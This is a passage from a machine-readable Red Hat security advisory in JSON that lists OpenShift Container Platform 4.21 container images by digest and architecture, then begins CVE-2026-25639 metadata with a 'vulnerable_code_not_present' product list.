"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:c6abce790ae93c39059b7dbfef6899b2ec75ba1a9864509f6cce28b1d356407e_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:c6abce790ae93c39059b7dbfef6899b2ec75ba1a9864509f6cce28b1d356407e_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:c6abce790ae93c39059b7dbfef6899b2ec75ba1a9864509f6cce28b1d356407e_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:f39b80836b998e584dc235933e600ee12746a3bfb0079aea1476a1eecf8f446d_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:f39b80836b998e584dc235933e600ee12746a3bfb0079aea1476a1eecf8f446d_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:f39b80836b998e584dc235933e600ee12746a3bfb0079aea1476a1eecf8f446d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:399931f0229e6dd1c8da11cf570db838af5b8113d67e0071e8e7b1fdc59f735c_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:399931f0229e6dd1c8da11cf570db838af5b8113d67e0071e8e7b1fdc59f735c_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:399931f0229e6dd1c8da11cf570db838af5b8113d67e0071e8e7b1fdc59f735c_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:5df3c4493997002d40d9278e7ef6b90fb98905a2bba169b0410980d297bfade3_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:5df3c4493997002d40d9278e7ef6b90fb98905a2bba169b0410980d297bfade3_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:5df3c4493997002d40d9278e7ef6b90fb98905a2bba169b0410980d297bfade3_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:89b38bc6c2b4405d467684858b8a4f8980f6ad9d721e7ca75e9956f923639240_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:89b38bc6c2b4405d467684858b8a4f8980f6ad9d721e7ca75e9956f923639240_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:89b38bc6c2b4405d467684858b8a4f8980f6ad9d721e7ca75e9956f923639240_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:ab067ec0877565544332595cf9d023f4ad3479d940a8f3cb4f1eaf3f930d9e0f_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:ab067ec0877565544332595cf9d023f4ad3479d940a8f3cb4f1eaf3f930d9e0f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:ab067ec0877565544332595cf9d023f4ad3479d940a8f3cb4f1eaf3f930d9e0f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:1659061e1d03edc348e920093f213b35e95512807ce7dd83b2f1bd0b012d7900_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:1659061e1d03edc348e920093f213b35e95512807ce7dd83b2f1bd0b012d7900_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:1659061e1d03edc348e920093f213b35e95512807ce7dd83b2f1bd0b012d7900_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:62075f81a8bc4ce5a7192023a80f2e27c2bc4fae547193776513d67fbddad601_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:62075f81a8bc4ce5a7192023a80f2e27c2bc4fae547193776513d67fbddad601_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:62075f81a8bc4ce5a7192023a80f2e27c2bc4fae547193776513d67fbddad601_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:750827c34059a77d8599b6171204bc17cf971c4b0e9470007f4db319df31c860_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:750827c34059a77d8599b6171204bc17cf971c4b0e9470007f4db319df31c860_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:750827c34059a77d8599b6171204bc17cf971c4b0e9470007f4db319df31c860_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:9324db9c450ee8a54926478918a4efa70943cbc29ae8e2e67f51fe60bfd75335_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:9324db9c450ee8a54926478918a4efa70943cbc29ae8e2e67f51fe60bfd75335_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:9324db9c450ee8a54926478918a4efa70943cbc29ae8e2e67f51fe60bfd75335_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:2d95f6a57074c1132b809a735cc09c4aaccbd08a2a689bc0ee87426f766733c3_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:2d95f6a57074c1132b809a735cc09c4aaccbd08a2a689bc0ee87426f766733c3_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:2d95f6a57074c1132b809a735cc09c4aaccbd08a2a689bc0ee87426f766733c3_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:9b5c05ee9e7460a2a3fbf2539a4248581d4a69712a2be5601451019c52353cb2_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:9b5c05ee9e7460a2a3fbf2539a4248581d4a69712a2be5601451019c52353cb2_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:9b5c05ee9e7460a2a3fbf2539a4248581d4a69712a2be5601451019c52353cb2_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:b6809f3b2d4107dbb9e3338f63aa2f0646f19dd15a8980742e2aaa2e38d75362_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:b6809f3b2d4107dbb9e3338f63aa2f0646f19dd15a8980742e2aaa2e38d75362_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:b6809f3b2d4107dbb9e3338f63aa2f0646f19dd15a8980742e2aaa2e38d75362_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:c6e0d575be3fe6bab07ec95b244600e5eb6e8fcae5df1fd7b344381aae921c17_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:c6e0d575be3fe6bab07ec95b244600e5eb6e8fcae5df1fd7b344381aae921c17_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:c6e0d575be3fe6bab07ec95b244600e5eb6e8fcae5df1fd7b344381aae921c17_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:18f11df416a261b5f882d67f4de9a2dabbd8b80006ecabd033504d3b0fadb779_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:18f11df416a261b5f882d67f4de9a2dabbd8b80006ecabd033504d3b0fadb779_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:18f11df416a261b5f882d67f4de9a2dabbd8b80006ecabd033504d3b0fadb779_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:709239c59cc22bd41c553a7f30c147c4fb33ed6f560cba9ff976a966cc58dc3c_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:709239c59cc22bd41c553a7f30c147c4fb33ed6f560cba9ff976a966cc58dc3c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:709239c59cc22bd41c553a7f30c147c4fb33ed6f560cba9ff976a966cc58dc3c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:af2f03bf9b66959ac4e8568bdf8ffe864faa8808bb6790b554b1c3d5d80ea112_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:af2f03bf9b66959ac4e8568bdf8ffe864faa8808bb6790b554b1c3d5d80ea112_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:af2f03bf9b66959ac4e8568bdf8ffe864faa8808bb6790b554b1c3d5d80ea112_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:bb8d6f977a5b10490657a0e713ce281ac0680bf68caf893c46fe9ca84093b4b1_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:bb8d6f977a5b10490657a0e713ce281ac0680bf68caf893c46fe9ca84093b4b1_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:bb8d6f977a5b10490657a0e713ce281ac0680bf68caf893c46fe9ca84093b4b1_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:3d7c4d5a5809c712563175779356907b945010bf1357b78382ae405d89a8fd57_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:3d7c4d5a5809c712563175779356907b945010bf1357b78382ae405d89a8fd57_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:3d7c4d5a5809c712563175779356907b945010bf1357b78382ae405d89a8fd57_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:4b5f35cd93750652837275a4227ee08c40b2b7769ffdeec8a4d7a32ace69bbce_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:4b5f35cd93750652837275a4227ee08c40b2b7769ffdeec8a4d7a32ace69bbce_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:4b5f35cd93750652837275a4227ee08c40b2b7769ffdeec8a4d7a32ace69bbce_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:5aefedbf52b1d9b3ce8f6283e0716d4706b82fde65461a6924889ee507dfaa87_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:5aefedbf52b1d9b3ce8f6283e0716d4706b82fde65461a6924889ee507dfaa87_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:5aefedbf52b1d9b3ce8f6283e0716d4706b82fde65461a6924889ee507dfaa87_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:a90a60e27885e3ac1f74d00cb255478652da90af02a3771750b8598a53e9e48a_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:a90a60e27885e3ac1f74d00cb255478652da90af02a3771750b8598a53e9e48a_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:a90a60e27885e3ac1f74d00cb255478652da90af02a3771750b8598a53e9e48a_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:9508fcde0738479d7195d2fc5cb6f18818bf9285192589dc79899bf052773d7e_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:9508fcde0738479d7195d2fc5cb6f18818bf9285192589dc79899bf052773d7e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:9508fcde0738479d7195d2fc5cb6f18818bf9285192589dc79899bf052773d7e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:1c68a858b265490854e9d48a61d3f98931c3283cbf71fd84395726ddfdbc7a66_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:1c68a858b265490854e9d48a61d3f98931c3283cbf71fd84395726ddfdbc7a66_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:1c68a858b265490854e9d48a61d3f98931c3283cbf71fd84395726ddfdbc7a66_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:15cf0592b04ce9f19f286634c3a03001ef16f37d89f7752222b167ccbae4f583_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:15cf0592b04ce9f19f286634c3a03001ef16f37d89f7752222b167ccbae4f583_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:15cf0592b04ce9f19f286634c3a03001ef16f37d89f7752222b167ccbae4f583_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:3a8ab1634350c3e9f3768b56beb304696d71f996f980ff3839c79e6eb4af1ea0_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:3a8ab1634350c3e9f3768b56beb304696d71f996f980ff3839c79e6eb4af1ea0_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:3a8ab1634350c3e9f3768b56beb304696d71f996f980ff3839c79e6eb4af1ea0_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:9508fcde0738479d7195d2fc5cb6f18818bf9285192589dc79899bf052773d7e_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:9508fcde0738479d7195d2fc5cb6f18818bf9285192589dc79899bf052773d7e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:9508fcde0738479d7195d2fc5cb6f18818bf9285192589dc79899bf052773d7e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:1c68a858b265490854e9d48a61d3f98931c3283cbf71fd84395726ddfdbc7a66_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:1c68a858b265490854e9d48a61d3f98931c3283cbf71fd84395726ddfdbc7a66_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:1c68a858b265490854e9d48a61d3f98931c3283cbf71fd84395726ddfdbc7a66_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:b40b75179bce35e2b49402bd6e345f234223f6379a845972122b9ebeb36ac40a_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:b40b75179bce35e2b49402bd6e345f234223f6379a845972122b9ebeb36ac40a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:b40b75179bce35e2b49402bd6e345f234223f6379a845972122b9ebeb36ac40a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:37bffa4965d7ec59ecbfe8abf0a23d1e0411f9445c27237f9ca923cd1b96cb66_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:37bffa4965d7ec59ecbfe8abf0a23d1e0411f9445c27237f9ca923cd1b96cb66_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:37bffa4965d7ec59ecbfe8abf0a23d1e0411f9445c27237f9ca923cd1b96cb66_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:4d2f0e638d7c2632738ffdca9c391df061bbbb623f67138031590ef31cde06e6_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:4d2f0e638d7c2632738ffdca9c391df061bbbb623f67138031590ef31cde06e6_arm64"
},
"product_reference": "registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:4d2f0e638d7c2632738ffdca9c391df061bbbb623f67138031590ef31cde06e6_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:549711d0027ee642c77126ff2cc280fef4ac6fa4b28605b9cbda4e34e3fcedfc_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:549711d0027ee642c77126ff2cc280fef4ac6fa4b28605b9cbda4e34e3fcedfc_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:549711d0027ee642c77126ff2cc280fef4ac6fa4b28605b9cbda4e34e3fcedfc_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:5ae6198359a92af6c4b317806ec8a33ff53d44189d14561a8f8a3153d7afdb81_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:5ae6198359a92af6c4b317806ec8a33ff53d44189d14561a8f8a3153d7afdb81_amd64"
},
"product_reference": "registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:5ae6198359a92af6c4b317806ec8a33ff53d44189d14561a8f8a3153d7afdb81_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:c4d991da60458b7fd027719a7fe411bdfe82b192e7e882767dda61037e28aa3e_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:c4d991da60458b7fd027719a7fe411bdfe82b192e7e882767dda61037e28aa3e_s390x"
},
"product_reference": "registry.redhat.io/openshift4/volume-data-source-validator-rhel9@sha256:c4d991da60458b7fd027719a7fe411bdfe82b192e7e882767dda61037e28aa3e_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:0670c2bb289901d477fbc283a5aea07cd38d7a7e19b16a9ac16f681bc94b2c62_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:81399846b57621b98c097a30f13e778d9842a8dc443ce62a37dad974b1f7f439_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a4de71b4f22f9f5f46300ff38cfda0e4b5647f286fd5bd365d9e0a6cadd94d5d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:ac86e849e17e9a83d6683ed0469538f758a53aec6fbe89df675c66ef66f007e6_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:2ecec54cb74d1a34486e71b455886ca4a88ee3b4f3e21fba7d7e3d17b00179fc_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5c538e8d7cb551cac0459c1971e8bf9800d1db3eaf7e66639ebaeb6c3d9305bb_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:ad92acc19589b0305162857f2a14d8174fc4cb90d5ffc09991f49de756ae61c7_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:edcabf99710bd0952e329b0edab7b7a86b93f9d34dfe17d3391c9405210f63dd_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:48d9d26f06bc34472304b35f6559e428bd1d599267d1298ccf2b199533af4749_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:52e53301f201de393f91cf3084e814e35fe6f93f0432969fd4c511c2ac51b911_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:7ed4a15043060bc2f6ed0ce98efca2721fe19efd8705ecc23ec410de836b6ac6_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:b39b3e7a8be95fb0190842c892edaac58878ef2a3c0e59a59365504aef68c101_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1571d23b7a60a14ca1f6942daa5a4681fec9f1fbdfcece0bc76d552ab96dc45a_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:6427f32947afaea5139673b7561ed3ea36b6d0a9272388146c96636a461d7e4b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:cf354f87320a3b730ade16800a31fd18edd643aa6b652d0249f6f531db8932ad_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dd52af230c401d3e17f80ed764ffc2d176c4f1278fd8be791d8098094acbbfa0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2131f098ee848c2a4190c1fea7410df1e465efd7bec4e62b36df7cfce07872ac_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2fb1acc8f1c8f4091671c53c1e2944c91a123a386233ae093def99b6ef6963a2_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:3c497ebfc92e76d91bdb7d81f44d42d245a87c85ca8752f933a89121e372fcf9_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:6032a0dbc7f698d3519118fb73fa99395d08be3c022231a293ba265442c31371_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:47c2783399e696c5e9c87ba45a653580d79f0ff9da2452c6bddc78c504a593be_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:6d6bbab810dd6cf82997f98c6eb27474c2f28ee6139d254e163045ae881ebca3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:ba9149621bc099a23abdf277f9dd9e1577d3e758fbcfeba8a85b4aba674822c4_amd64",
